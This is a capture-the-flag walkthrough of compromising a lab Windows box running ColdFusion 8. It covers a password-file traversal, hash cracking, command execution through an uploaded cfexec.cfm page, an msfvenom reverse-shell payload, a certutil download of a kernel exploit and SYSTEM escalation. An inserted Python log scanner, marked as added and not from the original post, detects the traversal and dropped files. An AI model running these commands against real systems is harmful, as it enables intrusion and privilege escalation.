This one was different right from the start. Our usual nmap -sC -sV did not produce ANY results, so I hit it with a bigger hammer: nmap -sS -A -sV -n -Pn 10.10.10.11
I'm going to skip 135 for now and see what's on 8500. There are 2 folders located at http://10.10.10.11:8500: CFIDE and cfdocs. When I try to navigate to them, everything times out. Refresh and they come back.... OK. This box is a bit buggy. No worries. I navigate through the 2 folders, but there's one page in CFIDE that jumps out: the Administrator page. From here, we learn that the site is running ColdFusion by Adobe, and from http://10.10.10.11:8500/cfdocs/htmldocs/help.html?content=CFScript_02.html we learn that it is ColdFusion 8. A simple Google search for ColdFusion 8 vulnerabilities nets us a juicy authentication bypass method. Nice! Let's see what we can do to exploit it.
[all one line]
We get a hashed password from the retrieved password.properties file:
#Wed Mar 22 20:53:51 EET 2017
rdspassword=0IA/F[[E>[$_6& \\Q>[K\=XP \n
password=2F635F6D20E3FDE0C53075A84B68FB07DCEC9B03
encrypted=true
Let's crack the hash. I drop it into our friendly neighborhood <a href="https://crackstation.net/">Crack Station</a> and it instantly comes back as the SHA-1 hash of 'happyday'. Great, now I'm singing O Happy Day in my head.
Lo and behold, I can now log into the ColdFusion Admin portal. So, let's jump back to the Google search and see what vulns I can exploit with admin access to the portal. If we look further down the page at the earlier URL, we see that we can upload a web traversal page as a .cfm file.
If done correctly, we can navigate to http://10.10.10.11:8500/CFIDE/cfexec.cfm and get this page.
And if we run the command set that is in that image (Command: c:\windows\system32\cmd.exe, Options: /c dir C:\Users > C:\ColdFusion8\wwwroot\CFIDE\userlist.txt), then we get a list of users.
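For the blue-team side of the steps so far: the traversal that pulled password.properties, the dropped /CFIDE/cfexec.cfm and the userlist.txt read-back all land in the web server's access log. The following is an added example, not from the original post, that runs three simple detections over constructed Common Log Format lines; the `login.cfm?page=` parameter in the sample is a placeholder, not the real bypass URL, and the "nothing but directories belongs in the CFIDE root" rule is an assumption you should check against a clean install.

```python
import re
from urllib.parse import unquote

# Constructed sample access log (not from the box); imitates the request pattern above.
SAMPLE_LOG = """\
10.10.14.5 - - [22/Mar/2017:20:50:01 +0200] "GET /CFIDE/administrator/index.cfm HTTP/1.1" 200 5123
10.10.14.5 - - [22/Mar/2017:20:50:09 +0200] "GET /cfdocs/htmldocs/help.html?content=CFScript_02.html HTTP/1.1" 200 8891
10.10.14.5 - - [22/Mar/2017:20:53:51 +0200] "GET /CFIDE/administrator/login.cfm?page=..%2F..%2F..%2Flib%2Fpassword.properties HTTP/1.1" 200 211
10.10.14.5 - - [22/Mar/2017:21:02:17 +0200] "GET /CFIDE/cfexec.cfm HTTP/1.1" 200 1440
10.10.14.5 - - [22/Mar/2017:21:02:40 +0200] "POST /CFIDE/cfexec.cfm HTTP/1.1" 200 302
10.10.14.5 - - [22/Mar/2017:21:02:45 +0200] "GET /CFIDE/userlist.txt HTTP/1.1" 200 98
"""

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<url>\S+) [^"]*" (?P<status>\d{3})'
)
# Heuristic (assumption): a .cfm or .txt directly in the CFIDE root is not expected traffic.
CFIDE_ROOT_FILE = re.compile(r"^/cfide/[^/?]+\.(cfm|txt)(\?|$)")


def decode(url: str) -> str:
    # Decode twice so a double-encoded "..%252F" still normalizes to "../".
    return unquote(unquote(url)).lower()


def classify(line: str):
    """Return a finding dict for a suspicious request, or None for benign/unparseable lines."""
    m = LOG_RE.match(line)
    if not m:
        return None
    url = decode(m.group("url"))
    findings = []
    if "../" in url or "..\\" in url:
        findings.append("path-traversal")
    if "password.properties" in url:
        findings.append("credential-file-read")
    if CFIDE_ROOT_FILE.match(url):
        findings.append("unexpected-file-in-cfide-root")
    if not findings:
        return None
    return {"ip": m.group("ip"), "time": m.group("ts"), "method": m.group("method"),
            "url": m.group("url"), "findings": findings}


def scan(log_text: str):
    return [hit for hit in (classify(l) for l in log_text.splitlines()) if hit]


if __name__ == "__main__":
    for hit in scan(SAMPLE_LOG):
        print(hit["time"], hit["ip"], hit["method"], hit["url"], ",".join(hit["findings"]))
```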
Now we know the user is tolis. Change the options field to
/c type C:\Users\tolis\Desktop\user.txt > C:\ColdFusion8\wwwroot\CFIDE\userlist.txt
and we have acquired the user flag! I try that same option set only with Administrator, but alas, permissions failed. I think it's about time we actually get a shell on this, don't you? I'll build the payload in msfvenom and then transfer it over.
msfvenom -p java/jsp_shell_reverse_tcp LHOST=YOURIP LPORT=443 -f raw > shell.jsp
Now, let's create a different scheduled task to grab the reverse shell, set up netcat and then run the shell using the same method as earlier.
Nice. We have a shell as tolis. Let's pull the systeminfo output (it's in the CTB file). We'll need that for the Windows Exploit Suggester (whose output is also in the CTB file). When we look at the output of the suggester, we see MS10-059,
which is a nice little kernel exploit from 2010 found at https://github.com/SecWiki/windows-kernel-exploits/tree/master/MS10-059. Transferring it has been a bit of a challenge, but I finally found:
certutil -urlcache -f "http://10.10.XX.XX/MS10-059.exe" MS10-059.exe
That will get the exploit onto your victim machine. Set up netcat with nc -lvnp #### and then run the exploit as "MS10-059.exe 10.10.XX.XX ####", where the X's are your IP and the #'s are your port number. Boom. NT AUTHORITY\SYSTEM and a root flag located in Users\Administrator\Desktop